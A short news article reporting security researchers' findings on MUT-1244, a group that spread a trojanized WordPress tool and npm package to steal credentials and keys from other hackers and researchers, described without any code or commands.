In an ironic turn of events, a sophisticated hacking group has managed to steal hundreds of thousands of WordPress login credentials from fellow cybercriminals through a deceptive software supply chain attack.
Security researchers from Datadog Security Labs revealed that an unidentified threat group, dubbed MUT-1244, orchestrated a year-long campaign targeting both malicious actors and security researchers by distributing trojanized versions of legitimate-looking software tools.
The attackers published a seemingly helpful WordPress tool called "yawpp" on GitHub that secretly contained malicious code. When users installed this tool, it would automatically download an infected npm package that deployed data-stealing malware on their systems.
Through this deceptive approach, the hackers managed to collect over 390,000 WordPress account credentials, which were likely stolen initially by other cybercriminals through illegal means. The stolen data was quietly exfiltrated to a Dropbox account controlled by the attackers.
The campaign employed multiple sophisticated techniques, including:
- Malicious GitHub repositories posing as security tools
- Infected npm packages that appeared legitimate
- Phishing emails targeting academic researchers
- Backdoored software that could steal sensitive data
Beyond stealing WordPress credentials, the malware also harvested SSH keys, AWS access credentials, and system information from infected machines every 12 hours while simultaneously running cryptocurrency mining operations.
The true identity and motives of MUT-1244 remain unknown. The professional quality of their malware and the precision of their attacks suggest they are a highly skilled group, though their diverse targeting and tactics have left researchers puzzled about their ultimate objectives.
This case highlights an unusual scenario in the cybercrime landscape, where hackers successfully turned the tables on other malicious actors, using their own methods against them.